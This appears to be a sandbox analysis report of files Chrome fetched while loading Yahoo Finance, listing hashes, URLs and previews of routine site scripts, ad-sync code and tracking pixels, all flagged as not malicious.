                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E8BED9F8953F95E4222BF2B164323ED4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:7DEC517C5C49AD67C4F241654F8955BBC8117BA6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E4E54DABDCA5C06C5BE6925E44303C4F817DA086A310A4F0BAA155A683FA9E10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CEA1567801CCEFD91C3A7EF389AA0A48AF194326F8D87A53BC95FCC36981766304A6C790E46FF0810C5038F97E07BDF754BC35A5003D24AEDC0414EE148B1F70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/sectorUtil.CQpnlAmT.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{t as m,u}from"./commonUtil.CI22_Irn.js";import{m as d}from"./utils.QCnxU1jw.js";const o=d(["168x126"]),S={imageSize:o.sizeMap["168x126"],imageTags:o.tags,isPagination:!0,queryRef:"newsAll"},P=["^YH311","^YH102","^YH308"];function b(a){var r,t;const{params:e}=a,s=(r=e==null?void 0:e.sector)==null?void 0:r.replace(/\?.*/,"").trim().toLowerCase();return{industry:(t=e==null?void 0:e.industry)==null?void 0:t.replace(/\?.*/,"").trim().toLowerCase(),sector:s}}function h(a=[]){const s=[{key:"sectors",name:m("SECTORS",{ns:"sectors"})},...a];return s.filter(Boolean).map(({key:n,name:r},t)=>{const c=s.slice(1,t+1).map(({key:l})=>l),[i,g]=c;return{href:u({sector:i,industry:g}),i13n:{elm:"sector",sec:"sector-breadcrumb",subsec:t===0?"sectors-all":n},title:r}})}export{b as a,P as d,h as g,S as n};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (15896), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):15896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.503616373683869
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:GGJ01yJn5yOIVmxV/ZUN/4hDEwu85wWoJNmpPvIE:GGJ00JngOCyZ+8l2Wush
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C73E0CB111244BC0796DA0E83348068B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C83D2843508D6BA4827C2DCA0670FFBDD4F1E4ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:9913C1ABBE147B7CC94C91FBE26B22D24F72B98F4DA5514D376A473B3D10ACD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9DF2085B42D146263164156B483EFEBB829DD49434591A2F511A4DE31E69A469DB4612C200382A9CABE10F11A3C5C52EB89AC7590F02149367BB144AC65E6CD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ads.pubmatic.com/AdServer/js/user_sync.html?gdpr=0&gdpr_consent=&us_privacy=&predirect=https%3A%2F%2Fpbs.yahoo.com%2Fsetuid%3Fbidder%3Dpubmatic%26gdpr%3D0%26gdpr_consent%3D%26gpp%3D%26gpp_sid%3D%26f%3Db%26uid%3D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<html><body><script type="text/javascript">(function(){var aa=window,p=navigator,ai=aa.top||aa,aj=aa.location.search.substr(1),A=encodeURIComponent,W=decodeURIComponent,aA=aa.parseInt,P=aa.PubMatic||(aa.PubMatic={}),K=0,ad=0,b=0,ao="pubmatic.com",V="ads."+ao,al=1,Q="https://",a=(aa.__cmp?1:0),an=function(aF){return typeof aF==="function"},au=console.log.bind(console,"PubMatic:"),at=function(aJ,aI){var aG=0,aF=aJ.length,aH=false;for(;aG<aF;aG++){if(aJ[aG]===aI){aH=true;break}}return aH},n=function(aF,aI){var aH=aa.document.createElement("script");aH.type="text/javascript";aH.src=aF;aH.async=true;if(an(aI)){aH.onload=aH.onreadystatechange=aI}var aG=aa.document.getElementsByTagName("script")[0];aG&&aG.parentNode&&an(aG.parentNode.appendChild)&&aG.parentNode.appendChild(aH)},aq=function(aH){var aG=aa.document.createElement("iframe");aG.src=aH;aG.style.height="0px";aG.style.width="0px";aG.style.display="none";aG.height=0;aG.width=0;aG.border="0px";aG.hspace="0";aG.vspace="0";aG.marginWidth=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cm.g.doubleclick.net/pixel?google_nid=bdsw&google_push=AXcoOmQCN11z7uK0oXHPY5Vwy3yk43l9NPP-JI9_UUfnatQWORwQpWVizMI_Tf1ycM1TUSpxCINlJkv7dHnNqXR4ZuM1UePW9hof0Q&google_hm=FTjOrZRsTy6QRWqqGJckZA==&gdpr=&gdpr_consent=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:"https://pagead2.googlesyndication.com/pcs/activeview?xai=AKAOjsuXwoQ_xtvI1PG5qEZslAXqrXPYnnOFrUVQF9hBwAW7V5n05jRwVnkSSkXUjTD62LfnUFNutx7TdUFbGSIdD15Sb9RCmI1B0WVMlGEKoBQKVAIq_kduenSPL_O8zHMLIaRo3j7GttqIdSMUub1mMIk&sig=Cg0ArKJSzLa--ZhzD1_VEAE&id=lidartos&mcvt=13621&p=0,0,90,728&tm=13628.599999999977&tu=7.599999999976717&mtos=13621,13621,13621,13621,13621&tos=13621,0,0,0,0&v=20241007&bin=7&avms=nio&bs=0,0&mc=1&if=1&vu=1&app=0&itpl=34&adk=1614649247&rs=6&la=0&cr=0&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0%3D&vs=4&r=b&co=2434776501&rst=1728414963740&rpt=2121&ec=1&met=mue&wmsd=0&pbe=0&fle=0&vae=0&spb=0&sfl=0&ffslot=0&reach=8&io2=0"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):165
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.80666143611544
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:JSA/FAJu6L2vWclOLNZFrZYTMQ4LNZFrSlKwM313kqugRF/FA4/FIev:vU2vWvLNZFrgMfLNZFr7wg1Ru+64Njv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B1FFAED8B9668B395F784DD975A882AF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:85F4BA4EB4ED11CC6BE25F67175519E9D2B8DA3E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:BF3179BEB53AAF37783F1D610493AFDC2285B0E159F25477E9C0A78B38FE9364
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3AF3264DBF5061D81C5A40DB797B517639A7B104F936B59D0CFB8084705319E7A9DB84238061F1F72AE691D521D8E977784C3238FCA7183B3F59598293661E61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/index.g5YcAAdQ.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{H as e,R as o}from"./control.CYgJF_JY.js";function i(r,t){throw new e(r,t)}function c(r,t){throw new o(r,t.toString())}new TextEncoder;export{i as e,c as r};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):149
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.106668500556004
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:HZ8sqDmJS4RKb5ykKcvXjXRHoNcHjVYuIfepp5bZIAdSbFS:H69mc4sl3O4jVJCepvNb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:AE5FFB8B9F718200BEECE321B27C2494
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DF8746A5480120C715B1049C742DA6C7E1A7EEA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:78D7CC5AC35882275B042C947BFFCF418BE0D5AA717E450C1DED37AE5E2B6DBF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A1ABD5E5FB5C6FD40E50F390D28B67DF3A1F284A8174436D8B7A13158FD35122EE0D8272867C1C288C54FC67B78B60D91EB334CA0D34F61B3A586B218F540AAA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/expand_more.DscV4c36.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M16.59 8.59 12 13.17 7.41 8.59 6 10l6 6 6-6z"/></svg>';export{s as C};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (5773)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):5774
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.326641152741979
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:Iotitk6L3rFAgGw7NXVkMk0Sk07xY09oGqbvhckGYc+jsk0Y59F05a9/ZlMVny8s:IoQGM36gt+7I2W09oGqbvhrGYc+jb0YN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:ABCBFF43126E7FAE972A2E57FFB0F004
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:64F27DE34929D3C33773EBE85597EE3D149B06E1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:00583B7EAB7F7E7FBA4871B8CC34625A2BC61314C5032BF13BDEC16CFE8A9196
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:68009B7DD9BABC6F2BC76A8084AD01FC18762F2FEDF28AF3250136DB28F3781321E692D512FAE40018EBAEA9E2A4F9F4A5453A6B2C12816E2F44DB4559F240EF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/marketsUtil.ScItRG1n.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{q as t}from"./commonUtil.CI22_Irn.js";const E={ns:"markets"};var k=(e=>(e.OVERVIEW="overview",e.INDICES="world-indices",e.FUTURES="commodities",e.BONDS="bonds",e.CURRENCIES="currencies",e.OPTIONS="options",e.SECTORS="sectors",e.STOCKS="stocks",e.CRYPTO="crypto",e.ETF="etfs",e.MUTUALFUNDS="mutualfunds",e))(k||{});const R={stocks:"equity",crypto:"cryptocurrency",etfs:"etf"},I=e=>e==="stocks"||e==="crypto"||e==="etfs"?R[e]:"",g={overview:{id:"OVERVIEW",uri:t({category:"overview"})},stocks:{id:"STOCKS",fields:["ticker","symbol","longName","shortName","regularMarketPrice","regularMarketChange","regularMarketChangePercent","regularMarketVolume","averageDailyVolume3Month","marketCap","trailingPE","fiftyTwoWeekChangePercent","fiftyTwoWeekRange","regularMarketOpen","longName","sparkline"],scrIds:{"most-active":"MOST_ACTIVES",gainers:"DAY_GAINERS",losers:"DAY_LOSERS","52-week-gainers":"FIFTY_TWO_WK_GAINERS","52-week-losers":"FIFTY_TWO_WK_LOSERS"},tabs:["most-active","trending","gainers","
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):246
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.8605056246503375
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:JSXYLTrZLv7AW8yXbYzTsh4H84vrLOAOvxK/Q/ys6vlyX2zTsh4tAisaBTF/FEDw:13rZD7AtRUh4vflKf16vlLUh4hBN+Cv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:013F9FADF3F10DA257091FA08063799A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:86259278011D14F6C4F27EBCD627DB0ECC1FA0BF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F39C13524D63105D7AEFB0D02D94ED1B194354F93A2371A4B42C73717A00DEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:326DE428BBC5336FDD58564FD2867BDBD3776145F6E487969873904D2F2CB01EB700724997E3B17CD98A48FC6193B9D535A56423A698082EF9DB93694972DA72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{d as s}from"./commonUtil.CI22_Irn.js";async function i(o,t){const[a]=await s(["toast"],o),n=t.id||String(Date.now());a.createToast({...t,id:n})}async function c(o,t){const[a]=await s(["toast"],o);a.removeToast(t.id)}export{i as a,c as r};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1368), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1368
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.639180621652545
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:CJT3qAMqI3qAMNPunfTsMo1MjNG/mAzKIXLs/USKCvQeHDkoMTamld:Ct6xqI6xNmfTdoqjN2mAeSsTKyQeSTj3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:482F8CA1330E074EA3FEC753E1D2481D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:CC23B9A46728D62D58679EFEFE5F6DD1FDBFDE86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:44DEF93F733939DD370570E6EBF664433243AE5344C434F3C7094238C1C12C6A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E6661D6E05D6BECBEA33F17AE28B1556798F9C71EC57E0D9E880E75E21BB201B87A88FC37073E0C41AA28DC68132D507EEF2636FD10CE88CE9F44B979DB92722
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:PubMatic.loadAsyncImagePixel('https://pixel.onaudience.com/?partner=214&mapped=0E953B97-4F55-458F-AF4A-D3EA6DD13C81&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://c1.adform.net/serving/cookie/match?party=14&cid=0E953B97-4F55-458F-AF4A-D3EA6DD13C81&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://cm-supply-web.gammaplatform.com/adx/usersyncsupply?pid=7&t=pixel');PubMatic.loadAsyncIframePixel('https://cm.adgrx.com/bridge?AG_PID=pubmatic&AG_SETCOOKIE&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://green.erne.co/pubmatic/cm?gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://a.tribalfusion.com/i.match?p=b11&redirect=https%3A//simage2.pubmatic.com/AdServer/Pug%3Fvcode%3Dbz0yJnR5cGU9MSZjb2RlPTMzMjYmdGw9MTI5NjAw%26piggybackCookie%3D%24TF_USER_ID_ENC%24&u=${PUBMATIC_UID}');PubMatic.loadAsyncIframePixel('https://matching.truffle.bid/sync/pub?sid=161&suid=https://simage2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM0NDQmdGw9MjAxNjA=&p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (15735)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):15774
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.3538214812563885
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:tjhokNAcq1IwoHp/AnzM9jD+3EQjXkrLMwH3Fom2xZ9T7zRar:NyIwW/AnzKDMEQTkrLMS3FxM9T7zRar
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:46EC7CD52EE9F5C1236B0DEA5072690A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:CF9337DE42260986BA6EC460E64AB5120A3E5445
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:96398EA031F2FABAC614F2A0719722AC6D4C531AFBC38D48C86DABD17D4D2D7F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:84C8EA4CF4AEC794FAB79D1251396671D336CB275AF068C773B5F7A0BF40A867F58E1713DA8155E3CE5EB661F9FA65F6D7B1A2C47D4441798292BA2D1D4CA526
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(){"use strict";var e=window.wafer,t=e.base||{};function n(n,o){if(e)return o=o||{},e.utils.elementInView(n,o,t.viewport)}function o(e,t,n,o,i){return{clean:t,dest:n,h:i,metaSize:!0,pos:e,supports:!1,w:o}}var i={context:{bucket:"",bucketId:"",device:"",intl:"",lang:"",meta:{},mode:"normal",region:"",rid:"",site:""},i13n:{}},a=["MAST","LDRB"],s=function(){var e,t,s,r,l,c=window,d=document,f=c.adsConfig,u=c.YAHOO,v=void 0===u?i:u,p=c.DARLA,m=void 0===p?null:p,h=c.wafer,g={},b="adRotateEvt",w="scroll",E="homepage-viewer",C="sda-",L=C+"LREC4",A=C+"MON2",y="native-leaderboard-ad",x="gemini-ad-refresh",R=!1;function O(){var o;if(f&&(t=f.rotation)&&(null===(o=null==f?void 0:f.positions)||void 0===o?void 0:o[t.currentpos]))if(f.clientPositionMeta.positions.forEach((function(e){g[e.id]=e})),r=g[t.currentpos],m)if(t.enableNavAdRotation&&h.on("fetch:success",(function(e){e.elem.classList.contains("nextgen-page-navigation")&&function(e){var t=c._darlaAutoEvt;t||(t=m.evtSettings("AUTO")||{
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (7406)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):7407
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.471289026670665
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:tWqYjsLguzdXTY0uVzgCdr33o10ywANjDfbTG/nOtocaH8lQYhG:mjsLeVUCdr3n3cJ/U
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:AB1E01F39A0FD2D1F0E049CF556ED9E5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B3F0D27115ED382D2106451B2BC90A28309CF173
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B45750621A2D12DA4D3A0A68862DC94DBFCC09B80FB2A4933620BD3A78DD9F9E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:58CCC7F78AF2BB52F064D7824119B57F9E9F20BE15351A2E9232CFEDD970FC39240CC7E7097BB83B58DD9B74FE14483CE5B4C7D9B91D85A27E41A4DF900DC320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Autocomplete.Dd1hiJZp.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as ce,e as z,b as x,d as E,f as G,j as p,i as F,q as o,_ as T,U as R,k as ne,l as O,a3 as $,G as fe,I as he,P as de}from"./scheduler.Dr9AAxFe.js";import{S as me,i as be,c as _e,b as Ce,m as we,t as ge,a as Se,d as ye}from"./index.DCSmZEjO.js";import{t as B,g as D}from"./commonUtil.CI22_Irn.js";import{I as qe}from"./Icon.BSWt_jx8.js";import{g as ke}from"./43.CtYdpA_T.js";import Ae from"./search.D1DBxgNd.js";function ee(a){let t;return{c(){t=z("div"),this.h()},l(n){t=E(n,"DIV",{class:!0}),G(t).forEach(F),this.h()},h(){o(t,"class","finsrch-rslt finsrch-custom-rst finsrch-show-recomlst yf-cs8l6v"),R(t,"finsrch-show-ftr",a[11])},m(n,f){ne(n,t,f)},p(n,f){f[0]&2048&&R(t,"finsrch-show-ftr",n[11])},d(n){n&&F(t)}}}function Te(a){let t,n,f,y,i,m,q,w,_,b,r,g,k;f=new qe({props:{size:a[9],icon:Ae,type:a[10],className:"tw-absolute !tw-inline-flex tw-top-3 tw-left-3"}});let u=typeof a[12]!="function"&&ee(a);return{c(){t=z("div"),n=z("form"),_e(f.$$.fragment),y=x(),i=z("input"),q=x(),u&&u.c(),
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cm.g.doubleclick.net/pixel?google_nid=rubicon&google_hm=NmVjMmE2MTdjMzAyMjc0YjFiNGExOWYzYTBjNzcwM2RmMTQ5MWE1Nw&gdpr=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
